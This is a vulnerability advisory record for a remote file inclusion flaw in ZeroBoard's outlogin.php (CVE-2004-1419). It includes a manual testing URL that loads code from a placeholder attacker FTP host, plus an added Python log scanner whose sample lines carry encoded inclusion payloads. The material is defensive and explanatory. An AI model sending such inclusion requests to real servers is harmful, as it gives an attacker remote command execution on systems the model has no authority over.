ZeroBoard outlogin.php Arbitrary Command Execution

2004-12-24T10:16:13
ID OSVDB:12580
Type osvdb
Reporter Jeremy Bae(swbae@stgsecurity.com)
Modified 2004-12-24T10:16:13

Description

Vulnerability Description

Zeroboard contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to outlogin.php not properly sanitizing user input supplied to the _zb_path variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Manual Testing Notes

http://[victim]/outlogin.php?_zb_path=ftp://[attacker]/pub/
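As an added defender's example (not part of the OSVDB record or of Zeroboard itself), the following Python scans Apache combined-format access log lines for requests to outlogin.php whose _zb_path parameter names a remote host, which is the inclusion pattern the advisory describes. The log lines, IP addresses and paths are constructed sample data.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Fields of an Apache "combined" access log line that the check needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# URL schemes PHP's include() fetches over the network when allow_url_fopen is on.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://")


def is_remote_include_attempt(target: str) -> bool:
    """True when the request targets outlogin.php with a _zb_path whose
    value names a remote host rather than a local directory."""
    parts = urlsplit(target)
    if parts.path.lower().rsplit("/", 1)[-1] != "outlogin.php":
        return False
    for value in parse_qs(parts.query, keep_blank_values=True).get("_zb_path", []):
        # parse_qs decoded once already; decode again to catch %25-style
        # double encoding of the scheme, then normalise case before matching.
        decoded = unquote(value).strip().lower()
        if decoded.startswith(REMOTE_SCHEMES):
            return True
    return False


def scan_log(lines):
    """Return (client_ip, request_target, status) for each matching line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_remote_include_attempt(m.group("target")):
            hits.append((m.group("ip"), m.group("target"), int(m.group("status"))))
    return hits


# Constructed sample log lines (RFC 5737 documentation addresses, not real hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Dec/2004:10:16:13 +0900] "GET /bbs/outlogin.php?_zb_path=ftp%3A%2F%2F198.51.100.9%2Fpub%2F HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
    '203.0.113.8 - - [24/Dec/2004:10:17:02 +0900] "GET /bbs/outlogin.php?_zb_path=http%253A%252F%252F198.51.100.9%252Fx.txt HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
    '192.0.2.5 - - [24/Dec/2004:10:18:40 +0900] "GET /bbs/outlogin.php?_zb_path=.%2F HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.0.2.6 - - [24/Dec/2004:10:19:01 +0900] "GET /bbs/zboard.php?id=notice HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, target, status in scan_log(SAMPLE_LOG):
        print(f"remote include attempt from {ip}: {target} (HTTP {status})")
```

On PHP installations of that era, setting allow_url_fopen = Off in php.ini stops include() from fetching URLs at all, which blocks this class of inclusion independently of the script.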

References:

Vendor URL: http://zb.cmsn.net/
Security Tracker: 1012677
Secunia Advisory ID: 13649
Related OSVDB ID: 12581
Related OSVDB ID: 12582
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-12/0410.html
Keyword: Remote File Inclusion
CVE: CVE-2004-1419